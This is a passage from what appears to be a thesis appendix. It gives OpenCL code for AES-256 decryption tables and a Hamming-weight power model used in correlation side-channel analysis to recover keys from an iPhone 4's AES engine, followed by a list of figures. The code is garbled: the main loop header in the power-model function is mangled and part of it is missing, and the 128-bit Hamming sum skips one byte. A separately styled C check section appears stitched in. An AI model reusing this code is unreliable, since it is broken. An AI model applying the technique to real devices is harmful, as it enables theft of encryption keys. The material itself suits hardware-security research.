    0x805d9fbe,0x93d0697c,0x2dd56fa9,0x1225cfb3,0x99acc83b,0x7d1810a7,0x639ce86e,0xbb3bdb7b,0x7826cd09,0x18596ef4,0xb79aec01,0x9a4f83a8,0x6e95e665,0xe6ffaa7e,0xcfbc2108,0xe815efe6,
    0x9be7bad9,0x366f4ace,0x099fead4,0x7cb029d6,0xb2a431af,0x233f2a31,0x94a5c630,0x66a235c0,0xbc4e7437,0xca82fca6,0xd090e0b0,0xd8a73315,0x9804f14a,0xdaec41f7,0x50cd7f0e,0xf691172f,
    0xd64d768d,0xb0ef434d,0x4daacc54,0x0496e4df,0xb5d19ee3,0x886a4c1b,0x1f2cc1b8,0x5165467f,0xea5e9d04,0x358c015d,0x7487fa73,0x410bfb2e,0x1d67b35a,0xd2db9252,0x5610e933,0x47d66d13,
    0x61d79a8c,0x0ca1377a,0x14f8598e,0x3c13eb89,0x27a9ceee,0xc961b735,0xe51ce1ed,0xb1477a3c,0xdfd29c59,0x73f2553f,0xce141879,0x37c773bf,0xcdf753ea,0xaafd5f5b,0x6f3ddf14,0xdb447886,
    0xf3afca81,0xc468b93e,0x3424382c,0x40a3c25f,0xc31d1672,0x25e2bc0c,0x493c288b,0x950dff41,0x01a83971,0xb30c08de,0xe4b4d89c,0xc1566490,0x84cb7b61,0xb632d570,0x5c6c4874,0x57b8d042};

__constant uint T2_inv[256]={
    0xf45150a7,0x417e5365,0x171ac3a4,0x273a965e,0xab3bcb6b,0x9d1ff145,0xfaacab58,0xe34b9303,0x302055fa,0x76adf66d,0xcc889176,0x02f5254c,0xe54ffcd7,0x2ac5d7cb,0x35268044,0x62b58fa3,
    0xb1de495a,0xba25671b,0xea45980e,0xfe5de1c0,0x2fc30275,0x4c8112f0,0x468da397,0xd36bc6f9,0x8f03e75f,0x9215959c,0x6dbfeb7a,0x5295da59,0xbed42d83,0x7458d321,0xe0492969,0xc98e44c8,
    0xc2756a89,0x8ef47879,0x58996b3e,0xb927dd71,0xe1beb64f,0x88f017ad,0x20c966ac,0xce7db43a,0xdf63184a,0x1ae58231,0x51976033,0x5362457f,0x64b1e077,0x6bbb84ae,0x81fe1ca0,0x08f9942b,
    0x48705868,0x458f19fd,0xde94876c,0x7b52b7f8,0x73ab23d3,0x4b72e202,0x1fe3578f,0x55662aab,0xebb20728,0xb52f03c2,0xc5869a7b,0x37d3a508,0x2830f287,0xbf23b2a5,0x0302ba6a,0x16ed5c82,
    0xcf8a2b1c,0x79a792b4,0x07f3f0f2,0x694ea1e2,0xda65cdf4,0x0506d5be,0x34d11f62,0xa6c48afe,0x2e349d53,0xf3a2a055,0x8a0532e1,0xf6a475eb,0x830b39ec,0x6040aaef,0x715e069f,0x6ebd5110,
    0x213ef98a,0xdd963d06,0x3eddae05,0xe64d46bd,0x5491b58d,0xc471055d,0x06046fd4,0x5060ff15,0x981924fb,0xbdd697e9,0x4089cc43,0xd967779e,0xe8b0bd42,0x8907888b,0x19e7385b,0xc879dbee,
    0x7ca1470a,0x427ce90f,0x84f8c91e,0x00000000,0x80098386,0x2b3248ed,0x111eac70,0x5a6c4e72,0x0efdfbff,0x850f5638,0xae3d1ed5,0x2d362739,0x0f0a64d9,0x5c6821a6,0x5b9bd154,0x36243a2e,
    0x0a0cb167,0x57930fe7,0xeeb4d296,0x9b1b9e91,0xc0804fc5,0xdc61a220,0x775a694b,0x121c161a,0x93e20aba,0xa0c0e52a,0x223c43e0,0x1b121d17,0x090e0b0d,0x8bf2adc7,0xb62db9a8,0x1e14c8a9,
    0xf1578519,0x75af4c07,0x99eebbdd,0x7fa3fd60,0x01f79f26,0x725cbcf5,0x6644c53b,0xfb5b347e,0x438b7629,0x23cbdcc6,0xedb668fc,0xe4b863f1,0x31d7cadc,0x63421085,0x97134022,0xc6842011,
    0x4a857d24,0xbbd2f83d,0xf9ae1132,0x29c76da1,0x9e1d4b2f,0xb2dcf330,0x860dec52,0xc177d0e3,0xb32b6c16,0x70a999b9,0x9411fa48,0xe9472264,0xfca8c48c,0xf0a01a3f,0x7d56d82c,0x3322ef90,
    0x4987c74e,0x38d9c1d1,0xca8cfea2,0xd498360b,0xf5a6cf81,0x7aa528de,0xb7da268e,0xad3fa4bf,0x3a2ce49d,0x78500d92,0x5f6a9bcc,0x7e546246,0x8df6c213,0xd890e8b8,0x392e5ef7,0xc382f5af,
    0x5d9fbe80,0xd0697c93,0xd56fa92d,0x25cfb312,0xacc83b99,0x1810a77d,0x9ce86e63,0x3bdb7bbb,0x26cd0978,0x596ef418,0x9aec01b7,0x4f83a89a,0x95e6656e,0xffaa7ee6,0xbc2108cf,0x15efe6e8,
    0xe7bad99b,0x6f4ace36,0x9fead409,0xb029d67c,0xa431afb2,0x3f2a3123,0xa5c63094,0xa235c066,0x4e7437bc,0x82fca6ca,0x90e0b0d0,0xa73315d8,0x04f14a98,0xec41f7da,0xcd7f0e50,0x91172ff6,
    0x4d768dd6,0xef434db0,0xaacc544d,0x96e4df04,0xd19ee3b5,0x6a4c1b88,0x2cc1b81f,0x65467f51,0x5e9d04ea,0x8c015d35,0x87fa7374,0x0bfb2e41,0x67b35a1d,0xdb9252d2,0x10e93356,0xd66d1347,
    0xd79a8c61,0xa1377a0c,0xf8598e14,0x13eb893c,0xa9ceee27,0x61b735c9,0x1ce1ede5,0x477a3cb1,0xd29c59df,0xf2553f73,0x141879ce,0xc773bf37,0xf753eacd,0xfd5f5baa,0x3ddf146f,0x447886db,
    0xafca81f3,0x68b93ec4,0x24382c34,0xa3c25f40,0x1d1672c3,0xe2bc0c25,0x3c288b49,0x0dff4195,0xa8397101,0x0c08deb3,0xb4d89ce4,0x566490c1,0xcb7b6184,0x32d570b6,0x6c48745c,0xb8d04257};

__constant uint T3_inv[256]={
    0x5150a7f4,0x7e536541,0x1ac3a417,0x3a965e27,0x3bcb6bab,0x1ff1459d,0xacab58fa,0x4b9303e3,0x2055fa30,0xadf66d76,0x889176cc,0xf5254c02,0x4ffcd7e5,0xc5d7cb2a,0x26804435,0xb58fa362,
    0xde495ab1,0x25671bba,0x45980eea,0x5de1c0fe,0xc302752f,0x8112f04c,0x8da39746,0x6bc6f9d3,0x03e75f8f,0x15959c92,0xbfeb7a6d,0x95da5952,0xd42d83be,0x58d32174,0x492969e0,0x8e44c8c9,
    0x756a89c2,0xf478798e,0x996b3e58,0x27dd71b9,0xbeb64fe1,0xf017ad88,0xc966ac20,0x7db43ace,0x63184adf,0xe582311a,0x97603351,0x62457f53,0xb1e07764,0xbb84ae6b,0xfe1ca081,0xf9942b08,
    0x70586848,0x8f19fd45,0x94876cde,0x52b7f87b,0xab23d373,0x72e2024b,0xe3578f1f,0x662aab55,0xb20728eb,0x2f03c2b5,0x869a7bc5,0xd3a50837,0x30f28728,0x23b2a5bf,0x02ba6a03,0xed5c8216,
    0x8a2b1ccf,0xa792b479,0xf3f0f207,0x4ea1e269,0x65cdf4da,0x06d5be05,0xd11f6234,0xc48afea6,0x349d532e,0xa2a055f3,0x0532e18a,0xa475ebf6,0x0b39ec83,0x40aaef60,0x5e069f71,0xbd51106e,
    0x3ef98a21,0x963d06dd,0xddae053e,0x4d46bde6,0x91b58d54,0x71055dc4,0x046fd406,0x60ff1550,0x1924fb98,0xd697e9bd,0x89cc4340,0x67779ed9,0xb0bd42e8,0x07888b89,0xe7385b19,0x79dbeec8,
    0xa1470a7c,0x7ce90f42,0xf8c91e84,0x00000000,0x09838680,0x3248ed2b,0x1eac7011,0x6c4e725a,0xfdfbff0e,0x0f563885,0x3d1ed5ae,0x3627392d,0x0a64d90f,0x6821a65c,0x9bd1545b,0x243a2e36,
    0x0cb1670a,0x930fe757,0xb4d296ee,0x1b9e919b,0x804fc5c0,0x61a220dc,0x5a694b77,0x1c161a12,0xe20aba93,0xc0e52aa0,0x3c43e022,0x121d171b,0x0e0b0d09,0xf2adc78b,0x2db9a8b6,0x14c8a91e,
    0x578519f1,0xaf4c0775,0xeebbdd99,0xa3fd607f,0xf79f2601,0x5cbcf572,0x44c53b66,0x5b347efb,0x8b762943,0xcbdcc623,0xb668fced,0xb863f1e4,0xd7cadc31,0x42108563,0x13402297,0x842011c6,
    0x857d244a,0xd2f83dbb,0xae1132f9,0xc76da129,0x1d4b2f9e,0xdcf330b2,0x0dec5286,0x77d0e3c1,0x2b6c16b3,0xa999b970,0x11fa4894,0x472264e9,0xa8c48cfc,0xa01a3ff0,0x56d82c7d,0x22ef9033,
    0x87c74e49,0xd9c1d138,0x8cfea2ca,0x98360bd4,0xa6cf81f5,0xa528de7a,0xda268eb7,0x3fa4bfad,0x2ce49d3a,0x500d9278,0x6a9bcc5f,0x5462467e,0xf6c2138d,0x90e8b8d8,0x2e5ef739,0x82f5afc3,
    0x9fbe805d,0x697c93d0,0x6fa92dd5,0xcfb31225,0xc83b99ac,0x10a77d18,0xe86e639c,0xdb7bbb3b,0xcd097826,0x6ef41859,0xec01b79a,0x83a89a4f,0xe6656e95,0xaa7ee6ff,0x2108cfbc,0xefe6e815,
    0xbad99be7,0x4ace366f,0xead4099f,0x29d67cb0,0x31afb2a4,0x2a31233f,0xc63094a5,0x35c066a2,0x7437bc4e,0xfca6ca82,0xe0b0d090,0x3315d8a7,0xf14a9804,0x41f7daec,0x7f0e50cd,0x172ff691,
    0x768dd64d,0x434db0ef,0xcc544daa,0xe4df0496,0x9ee3b5d1,0x4c1b886a,0xc1b81f2c,0x467f5165,0x9d04ea5e,0x015d358c,0xfa737487,0xfb2e410b,0xb35a1d67,0x9252d2db,0xe9335610,0x6d1347d6,
    0x9a8c61d7,0x377a0ca1,0x598e14f8,0xeb893c13,0xceee27a9,0xb735c961,0xe1ede51c,0x7a3cb147,0x9c59dfd2,0x553f73f2,0x1879ce14,0x73bf37c7,0x53eacdf7,0x5f5baafd,0xdf146f3d,0x7886db44,
    0xca81f3af,0xb93ec468,0x382c3424,0xc25f40a3,0x1672c31d,0xbc0c25e2,0x288b493c,0xff41950d,0x397101a8,0x08deb30c,0xd89ce4b4,0x6490c156,0x7b6184cb,0xd570b632,0x48745c6c,0xd04257b8};

__constant uint IK0[256] = {
    0x00000000,0x0b0d090e,0x161a121c,0x1d171b12,0x2c342438,0x27392d36,0x3a2e3624,0x31233f2a,0x58684870,0x5365417e,0x4e725a6c,0x457f5362,0x745c6c48,0x7f516546,0x62467e54,0x694b775a,
    0xb0d090e0,0xbbdd99ee,0xa6ca82fc,0xadc78bf2,0x9ce4b4d8,0x97e9bdd6,0x8afea6c4,0x81f3afca,0xe8b8d890,0xe3b5d19e,0xfea2ca8c,0xf5afc382,0xc48cfca8,0xcf81f5a6,0xd296eeb4,0xd99be7ba,
    0x7bbb3bdb,0x70b632d5,0x6da129c7,0x66ac20c9,0x578f1fe3,0x5c8216ed,0x41950dff,0x4a9804f1,0x23d373ab,0x28de7aa5,0x35c961b7,0x3ec468b9,0x0fe75793,0x04ea5e9d,0x19fd458f,0x12f04c81,
    0xcb6bab3b,0xc066a235,0xdd71b927,0xd67cb029,0xe75f8f03,0xec52860d,0xf1459d1f,0xfa489411,0x9303e34b,0x980eea45,0x8519f157,0x8e14f859,0xbf37c773,0xb43ace7d,0xa92dd56f,0xa220dc61,
    0xf66d76ad,0xfd607fa3,0xe07764b1,0xeb7a6dbf,0xda595295,0xd1545b9b,0xcc434089,0xc74e4987,0xae053edd,0xa50837d3,0xb81f2cc1,0xb31225cf,0x82311ae5,0x893c13eb,0x942b08f9,0x9f2601f7,
    0x46bde64d,0x4db0ef43,0x50a7f451,0x5baafd5f,0x6a89c275,0x6184cb7b,0x7c93d069,0x779ed967,0x1ed5ae3d,0x15d8a733,0x08cfbc21,0x03c2b52f,0x32e18a05,0x39ec830b,0x24fb9819,0x2ff69117,
    0x8dd64d76,0x86db4478,0x9bcc5f6a,0x90c15664,0xa1e2694e,0xaaef6040,0xb7f87b52,0xbcf5725c,0xd5be0506,0xdeb30c08,0xc3a4171a,0xc8a91e14,0xf98a213e,0xf2872830,0xef903322,0xe49d3a2c,
    0x3d06dd96,0x360bd498,0x2b1ccf8a,0x2011c684,0x1132f9ae,0x1a3ff0a0,0x0728ebb2,0x0c25e2bc,0x656e95e6,0x6e639ce8,0x737487fa,0x78798ef4,0x495ab1de,0x4257b8d0,0x5f40a3c2,0x544daacc,
    0xf7daec41,0xfcd7e54f,0xe1c0fe5d,0xeacdf753,0xdbeec879,0xd0e3c177,0xcdf4da65,0xc6f9d36b,0xafb2a431,0xa4bfad3f,0xb9a8b62d,0xb2a5bf23,0x83868009,0x888b8907,0x959c9215,0x9e919b1b,
    0x470a7ca1,0x4c0775af,0x51106ebd,0x5a1d67b3,0x6b3e5899,0x60335197,0x7d244a85,0x7629438b,0x1f6234d1,0x146f3ddf,0x097826cd,0x02752fc3,0x335610e9,0x385b19e7,0x254c02f5,0x2e410bfb,
    0x8c61d79a,0x876cde94,0x9a7bc586,0x9176cc88,0xa055f3a2,0xab58faac,0xb64fe1be,0xbd42e8b0,0xd4099fea,0xdf0496e4,0xc2138df6,0xc91e84f8,0xf83dbbd2,0xf330b2dc,0xee27a9ce,0xe52aa0c0,
    0x3cb1477a,0x37bc4e74,0x2aab5566,0x21a65c68,0x10856342,0x1b886a4c,0x069f715e,0x0d927850,0x64d90f0a,0x6fd40604,0x72c31d16,0x79ce1418,0x48ed2b32,0x43e0223c,0x5ef7392e,0x55fa3020,
    0x01b79aec,0x0aba93e2,0x17ad88f0,0x1ca081fe,0x2d83bed4,0x268eb7da,0x3b99acc8,0x3094a5c6,0x59dfd29c,0x52d2db92,0x4fc5c080,0x44c8c98e,0x75ebf6a4,0x7ee6ffaa,0x63f1e4b8,0x68fcedb6,
    0xb1670a0c,0xba6a0302,0xa77d1810,0xac70111e,0x9d532e34,0x965e273a,0x8b493c28,0x80443526,0xe90f427c,0xe2024b72,0xff155060,0xf418596e,0xc53b6644,0xce366f4a,0xd3217458,0xd82c7d56,
    0x7a0ca137,0x7101a839,0x6c16b32b,0x671bba25,0x5638850f,0x5d358c01,0x40229713,0x4b2f9e1d,0x2264e947,0x2969e049,0x347efb5b,0x3f73f255,0x0e50cd7f,0x055dc471,0x184adf63,0x1347d66d,
    0xcadc31d7,0xc1d138d9,0xdcc623cb,0xd7cb2ac5,0xe6e815ef,0xede51ce1,0xf0f207f3,0xfbff0efd,0x92b479a7,0x99b970a9,0x84ae6bbb,0x8fa362b5,0xbe805d9f,0xb58d5491,0xa89a4f83,0xa397468d
};

#define INV_SUBROUND_0 \
    w[0] = T0_inv[ptextAddkey[0]] ^ T1_inv[ptextAddkey[13]] ^ T2_inv[ptextAddkey[10]] ^ T3_inv[ptextAddkey[7]] \
    ^ IK0[aeskey[(14-i)*16 + 0 ]] \
    ^((IK0[aeskey[(14-i)*16 + 1 ]]<<8 ) ^ (IK0[aeskey[(14-i)*16 + 1]]>>24)) \
    ^((IK0[aeskey[(14-i)*16 + 2 ]]<<16) ^ (IK0[aeskey[(14-i)*16 + 2]]>>16)) \
    ^((IK0[aeskey[(14-i)*16 + 3 ]]<<24) ^ (IK0[aeskey[(14-i)*16 + 3]]>>8))

#define INV_SUBROUND_1 \
    w[1] = T0_inv[ptextAddkey[4]] ^ T1_inv[ptextAddkey[1]] ^ T2_inv[ptextAddkey[14]] ^ T3_inv[ptextAddkey[11]] \
    ^ IK0[aeskey[(14-i)*16 + 4 ]] \
    ^((IK0[aeskey[(14-i)*16 + 5 ]]<<8 ) ^ (IK0[aeskey[(14-i)*16 + 5]]>>24)) \
    ^((IK0[aeskey[(14-i)*16 + 6 ]]<<16) ^ (IK0[aeskey[(14-i)*16 + 6]]>>16)) \
    ^((IK0[aeskey[(14-i)*16 + 7 ]]<<24) ^ (IK0[aeskey[(14-i)*16 + 7]]>>8))

#define INV_SUBROUND_2 \
    w[2] = T0_inv[ptextAddkey[8]] ^ T1_inv[ptextAddkey[5]] ^ T2_inv[ptextAddkey[2]] ^ T3_inv[ptextAddkey[15]] \
    ^ IK0[aeskey[(14-i)*16 + 8 ]] \
    ^((IK0[aeskey[(14-i)*16 + 9 ]]<<8 ) ^ (IK0[aeskey[(14-i)*16 + 9]]>>24)) \
    ^((IK0[aeskey[(14-i)*16 + 10]]<<16) ^ (IK0[aeskey[(14-i)*16 + 10]]>>16)) \
    ^((IK0[aeskey[(14-i)*16 + 11]]<<24) ^ (IK0[aeskey[(14-i)*16 + 11]]>>8))

#define INV_SUBROUND_3 \
    w[3] = T0_inv[ptextAddkey[12]] ^ T1_inv[ptextAddkey[ 9]] ^ T2_inv[ptextAddkey[ 6]] ^ T3_inv[ptextAddkey[3]] \
    ^ IK0[aeskey[(14-i)*16 + 12 ]] \
    ^((IK0[aeskey[(14-i)*16 + 13]]<<8 ) ^ (IK0[aeskey[(14-i)*16 + 13]]>>24)) \
    ^((IK0[aeskey[(14-i)*16 + 14]]<<16) ^ (IK0[aeskey[(14-i)*16 + 14]]>>16)) \
    ^((IK0[aeskey[(14-i)*16 + 15]]<<24) ^ (IK0[aeskey[(14-i)*16 + 15]]>>8))


__constant uchar sbox[256] = {
    0x63,0x7C,0x77,0x7B,0xF2,0x6B,0x6F,0xC5,0x30,0x01,0x67,0x2B,0xFE,0xD7,0xAB,0x76,
    0xCA,0x82,0xC9,0x7D,0xFA,0x59,0x47,0xF0,0xAD,0xD4,0xA2,0xAF,0x9C,0xA4,0x72,0xC0,
    0xB7,0xFD,0x93,0x26,0x36,0x3F,0xF7,0xCC,0x34,0xA5,0xE5,0xF1,0x71,0xD8,0x31,0x15,
    0x04,0xC7,0x23,0xC3,0x18,0x96,0x05,0x9A,0x07,0x12,0x80,0xE2,0xEB,0x27,0xB2,0x75,
    0x09,0x83,0x2C,0x1A,0x1B,0x6E,0x5A,0xA0,0x52,0x3B,0xD6,0xB3,0x29,0xE3,0x2F,0x84,
    0x53,0xD1,0x00,0xED,0x20,0xFC,0xB1,0x5B,0x6A,0xCB,0xBE,0x39,0x4A,0x4C,0x58,0xCF,
    0xD0,0xEF,0xAA,0xFB,0x43,0x4D,0x33,0x85,0x45,0xF9,0x02,0x7F,0x50,0x3C,0x9F,0xA8,
    0x51,0xA3,0x40,0x8F,0x92,0x9D,0x38,0xF5,0xBC,0xB6,0xDA,0x21,0x10,0xFF,0xF3,0xD2,
    0xCD,0x0C,0x13,0xEC,0x5F,0x97,0x44,0x17,0xC4,0xA7,0x7E,0x3D,0x64,0x5D,0x19,0x73,
    0x60,0x81,0x4F,0xDC,0x22,0x2A,0x90,0x88,0x46,0xEE,0xB8,0x14,0xDE,0x5E,0x0B,0xDB,
    0xE0,0x32,0x3A,0x0A,0x49,0x06,0x24,0x5C,0xC2,0xD3,0xAC,0x62,0x91,0x95,0xE4,0x79,
    0xE7,0xC8,0x37,0x6D,0x8D,0xD5,0x4E,0xA9,0x6C,0x56,0xF4,0xEA,0x65,0x7A,0xAE,0x08,
    0xBA,0x78,0x25,0x2E,0x1C,0xA6,0xB4,0xC6,0xE8,0xDD,0x74,0x1F,0x4B,0xBD,0x8B,0x8A,
    0x70,0x3E,0xB5,0x66,0x48,0x03,0xF6,0x0E,0x61,0x35,0x57,0xB9,0x86,0xC1,0x1D,0x9E,
    0xE1,0xF8,0x98,0x11,0x69,0xD9,0x8E,0x94,0x9B,0x1E,0x87,0xE9,0xCE,0x55,0x28,0xDF,
    0x8C,0xA1,0x89,0x0D,0xBF,0xE6,0x42,0x68,0x41,0x99,0x2D,0x0F,0xB0,0x54,0xBB,0x16};


inline uchar hamming_weight(uchar c){
    // From Advances in Visual Computing: 4th International Symposium, ISVC 2008
    uchar d = c & 0b01010101;
    uchar e = (c >> 1) & 0b01010101;
    uchar f = d+e;
    uchar g = f & 0b00110011;
    uchar h = (f >> 2) & 0b00110011;
    uchar i = g+h;
    uchar j = i & 0b00001111;
    uchar k = (i >> 4) & 0b00001111;

    return j + k;
}

inline uchar hamming_weight_p128(const uchar s[16]){
    return
        hamming_weight(s[0]) +
        hamming_weight(s[1]) +
        hamming_weight(s[2]) +
        hamming_weight(s[3]) +
        hamming_weight(s[4]) +
        hamming_weight(s[5]) +
        hamming_weight(s[ 6]) +
        hamming_weight(s[7]) +
        hamming_weight(s[8]) +
        hamming_weight(s[10]) +
        hamming_weight(s[11]) +
        hamming_weight(s[12]) +
        hamming_weight(s[13]) +
        hamming_weight(s[14]) +
        hamming_weight(s[15]);
}

inline void MixColumns(uchar* state){
#define xtime(x) ((x<<1) ^ (((x>>7) & 1) * 0x1b))
    uchar Tmp, Tm, t;
    for (uchar i = 0; i < 4; ++i)
    {
        t = state[i*4+0];
        Tmp = state[i*4+0] ^ state[i*4+1] ^ state[i*4+2] ^ state[i*4+3] ;
        Tm = state[i*4+0] ^ state[i*4+1] ; Tm = xtime(Tm); state[i*4+0] ^= Tm ^ Tmp ;
        Tm = state[i*4+1] ^ state[i*4+2] ; Tm = xtime(Tm); state[i*4+1] ^= Tm ^ Tmp ;
        Tm = state[i*4+2] ^ state[i*4+3] ; Tm = xtime(Tm); state[i*4+2] ^= Tm ^ Tmp ;
        Tm = state[i*4+3] ^ t ; Tm = xtime(Tm); state[i*4+3] ^= Tm ^ Tmp ;
    }
}

#define Multiply(x, y) \
    (((y & 1) * x) ^ \
    ((y>>1 & 1) * xtime(x)) ^ \
    ((y>>2 & 1) * xtime(xtime(x))) ^ \
    ((y>>3 & 1) * xtime(xtime(xtime(x)))) ^ \
    ((y>>4 & 1) * xtime(xtime(xtime(xtime(x))))))

inline void InvMixColumns(uchar* state){
    uchar a, b, c, d;
    for (uchar i = 0; i < 4; ++i)
    {
        a = state[i*4+0];
        b = state[i*4+1];
        c = state[i*4+2];
        d = state[i*4+3];

        state[i*4+0] = Multiply(a,0x0e)^Multiply(b,0x0b)^Multiply(c,0x0d)^Multiply(d,0x09);
        state[i*4+1] = Multiply(a,0x09)^Multiply(b,0x0e)^Multiply(c,0x0b)^Multiply(d,0x0d);
        state[i*4+2] = Multiply(a,0x0d)^Multiply(b,0x09)^Multiply(c,0x0e)^Multiply(d,0x0b);
        state[i*4+3] = Multiply(a,0x0b)^Multiply(b,0x0d)^Multiply(c,0x09)^Multiply(d,0x0e);
    }
}

inline uchar powermodel(__global const struct MeasurementStructure *msm){
    uchar ptextAddkey[16];
    ptextAddkey[0]=msm->Input[0]^aeskey[16*14 + 0];
    ptextAddkey[1]=msm->Input[1]^aeskey[16*14 + 1];
    ptextAddkey[2]=msm->Input[2]^aeskey[16*14 + 2];
    ptextAddkey[3]=msm->Input[3]^aeskey[16*14 + 3];
    ptextAddkey[4]=msm->Input[4]^aeskey[16*14 + 4];
    ptextAddkey[5]=msm->Input[5]^aeskey[16*14 + 5];
    ptextAddkey[ 6] = msm->Input[ 6] ^ aeskey[16*14 + 6];
    ptextAddkey[7]=msm->Input[7]^aeskey[16*14 + 7];
    ptextAddkey[8]=msm->Input[8]^aeskey[16*14 + 8];
    ptextAddkey[ 9] = msm->Input[ 9] ^ aeskey[16*14 + 9];
    ptextAddkey[10] = msm->Input[10] ^ aeskey[16*14 + 10];
    ptextAddkey[11] = msm->Input[11] ^ aeskey[16*14 + 11];
    ptextAddkey[12] = msm->Input[12] ^ aeskey[16*14 + 12];
    ptextAddkey[13] = msm->Input[13] ^ aeskey[16*14 + 13];
    ptextAddkey[14] = msm->Input[14] ^ aeskey[16*14 + 14];
    ptextAddkey[15] = msm->Input[15] ^ aeskey[16*14 + 15];

    uint w[4] = {0};

    for (int i=1; iOutput[0];
                ptextAddkey[1]^=msm->Output[1];
                ptextAddkey[2]^=msm->Output[2];
                ptextAddkey[3]^=msm->Output[3];
                ptextAddkey[4]^=msm->Output[4];
                ptextAddkey[5]^=msm->Output[5];
                ptextAddkey[ 6] ^= msm->Output[ 6];
                ptextAddkey[7]^=msm->Output[7];
                ptextAddkey[8]^=msm->Output[8];
                ptextAddkey[ 9] ^= msm->Output[ 9];
                ptextAddkey[10] ^= msm->Output[10];
                ptextAddkey[11] ^= msm->Output[11];
                ptextAddkey[12] ^= msm->Output[12];
                ptextAddkey[13] ^= msm->Output[13];
                ptextAddkey[14] ^= msm->Output[14];
                ptextAddkey[15] ^= msm->Output[15];
#else
                ptextAddkey[0]^=msm->Output[0]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 0];
                ptextAddkey[1]^=msm->Output[1]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 1];
                ptextAddkey[2]^=msm->Output[2]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 2];
                ptextAddkey[3]^=msm->Output[3]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 3];
                ptextAddkey[4]^=msm->Output[4]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 4];
                ptextAddkey[5]^=msm->Output[5]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 5];
                ptextAddkey[ 6] ^= msm->Output[ 6] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 6];
                ptextAddkey[7]^=msm->Output[7]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 7];
                ptextAddkey[8]^=msm->Output[8]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 8];
                ptextAddkey[ 9] ^= msm->Output[ 9] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 9];
                ptextAddkey[10] ^= msm->Output[10] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +10];
                ptextAddkey[11] ^= msm->Output[11] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +11];
                ptextAddkey[12] ^= msm->Output[12] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +12];
                ptextAddkey[13] ^= msm->Output[13] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +13];
                ptextAddkey[14] ^= msm->Output[14] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +14];
                ptextAddkey[15] ^= msm->Output[15] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +15];
#endif
            }else{
                *(uint*)&ptextAddkey[0]^=w[0];
                *(uint*)&ptextAddkey[4]^=w[1];
                *(uint*)&ptextAddkey[8]^=w[2];
                *(uint*)&ptextAddkey[12] ^= w[3];
            }
            break;
        }

        *(uint*)&ptextAddkey[0]=w[0];
        *(uint*)&ptextAddkey[4]=w[1];
        *(uint*)&ptextAddkey[8]=w[2];
        *(uint*)&ptextAddkey[12] = w[3];
    }

    return hamming_weight_p128(ptextAddkey);
}

Listing B.5: OpenCL source code for leaking power model
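
The bit-counting helper used by the power model can be checked on the host in isolation. The following is a minimal sketch in plain C, not part of the thesis code: it mirrors the masked-add popcount of `hamming_weight()` from Listing B.5 and compares it against a bit-by-bit reference for all 256 byte values. The names `hamming_weight_naive`, `hamming_weight_128` and `check_hamming_weight` are hypothetical and introduced only for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Masked-add popcount of one byte, following the same three steps as
 * hamming_weight() in Listing B.5: pairs, then nibbles, then the byte. */
static uint8_t hamming_weight(uint8_t c) {
    uint8_t pairs   = (uint8_t)((c & 0x55) + ((c >> 1) & 0x55));
    uint8_t nibbles = (uint8_t)((pairs & 0x33) + ((pairs >> 2) & 0x33));
    return (uint8_t)((nibbles & 0x0F) + ((nibbles >> 4) & 0x0F));
}

/* Reference implementation (hypothetical helper): count set bits one by one. */
static uint8_t hamming_weight_naive(uint8_t c) {
    uint8_t n = 0;
    while (c) {
        n = (uint8_t)(n + (c & 1u));
        c >>= 1;
    }
    return n;
}

/* Hamming weight of a 16-byte AES state, written as a loop over all bytes
 * (hypothetical helper, an assumption about the intended 128-bit model). */
static unsigned hamming_weight_128(const uint8_t s[16]) {
    unsigned total = 0;
    for (int i = 0; i < 16; ++i)
        total += hamming_weight(s[i]);
    return total;
}

/* Exhaustive check: both popcounts must agree on every byte value. */
static void check_hamming_weight(void) {
    for (unsigned v = 0; v < 256; ++v)
        assert(hamming_weight((uint8_t)v) == hamming_weight_naive((uint8_t)v));
}
```

Written as a loop, the 128-bit sum covers all sixteen state bytes. The unrolled sum in `hamming_weight_p128()`, as printed in the listing, contains no term for `s[9]`, which may be unintentional.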

List of Figures

2.1 Overview of Physical attacks
2.2 CMOS inverter [Wika]
2.3 Logic gates [Wikb]

3.1 iPhone 4 mainboard with and without metal shielding
3.2 30 pin iPhone connector with UART exposed
3.3 Exposing iPhone GPIO pins
3.4 iPhone 4 mainboard with battery connector removed
3.5 iPhone 4 mainboard mounted on a stage
3.6 LeCroy WaveRunner 8254M oscilloscope

5.6 Power model notation
5.7 Tested power models
5.8 Additional large power models
5.1 Traces for different number of blocks being decrypted in AES256-CBC mode
5.2 Multiple AES decryption traces of different number of block plotted on top of each other
5.3 AES decryption timings
5.4 Non-Specific t-test plots
5.5 Signal-to-Noise Ratio using the hamming weight of the 6th ciphertext/plaintext byte as power model
5.9 Correlation traces of leaking power model computed for round 0-14 for multiple blocks
5.10 Correlation traces of smaller hamming models computed for round 1-14 of block 2
5.11 3D heatmap of the SoC plotting highest correlation in time over physical space using the leaking 128-bit power model
5.12 EM probe positioning on the SoC based on heatmap analysis
5.13 Correlation traces for known key
5.14 Visualizing highest correlation values for each key byte in the known key correlation trace
5.15 Correlation over keys for key byte index 8 and 5 of known key measurements
5.16 Correlation over time with the highest peak for byte index 10 of the target key starting from sample 11'000
5.17 Correlation over keys for target key bytes of the fifth decryption block
5.18 Correlation over keys for close by samples for target key byte index 4 of the fifth block
5.19 Correlation over keys for target key byte index 4 of the second decryption block
5.20 Correlation over traces for bytes of the fifth block of target key decryptions

6.1 500 traces plotted after each alignment step
6.2 Mean trace processing during automatic alignment

List of Listings

4.1 Using jtool to extract certain sections of a Mach-O file
4.2 Assembly of boot loaders AES engine invocation
4.3 AES function replacement code

